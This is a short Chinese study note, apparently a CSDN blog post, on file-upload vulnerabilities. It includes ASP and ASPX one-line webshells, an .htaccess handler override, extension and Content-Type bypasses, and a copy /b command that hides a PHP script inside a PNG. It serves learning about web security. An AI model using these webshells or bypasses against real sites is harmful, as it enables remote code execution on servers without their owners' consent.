文件上传漏洞总结

upload文件上传学习总结

1.文件上传漏洞原理

由于网站在对文件的上传功能中没有严格校验上传文件后缀和文件类型,导致上传的文件可以被解析成可执行的脚本文件(php、jsp、xml、cer等文件),以来达到攻击者的攻击目的

常用的一句话木马:

php一句话木马:

asp一句话木马: <%eval request("value")%>

aspx一句话木马: <%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>

1.前端绕过,抓包修改缀名(.png/.jpge/gif/....)

绕过方法:

  • 将需要上传的恶意代码文件类型改为允许上传的类型,例如将dama.asp改为dama.jpg上传,配置Burp Suite代理进行抓包,然后再将文件名dama.jpg改为dama.asp。

2.上传.htaccess文件攻击

<FilesMatch "指定文件">

SetHandler application/x-httpd-php

我们上传的.htaccess可以覆盖掉原理的文件

3.白名单策略

白名单策略就是将规定在名单以内的文件其他文件全部都看作不合法

4.检测Cotent-Type修改

5.检查文件头(参考CSDN博主「拓海AE」的原创文章)

不同类型文件的文件头或者标志位实际上是不一样的,后端能够根据这些内容来判断是什么类型的文件。

这些是常见的图像格式的文件头:

list($width, $height, $type, $attr) = getimagesize("img/flag.jpg");

$ext = image_type_to_extension($type);

$image_type = exif_imagetype("img/flag.jpg");

getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串。

image_type_to_extension() 根据给定的常量 IMAGETYPE_XXX 返回后缀名。

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

6.制作 图片🐎

代码:

copy sxc.png/b+info.php/a info.pn

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值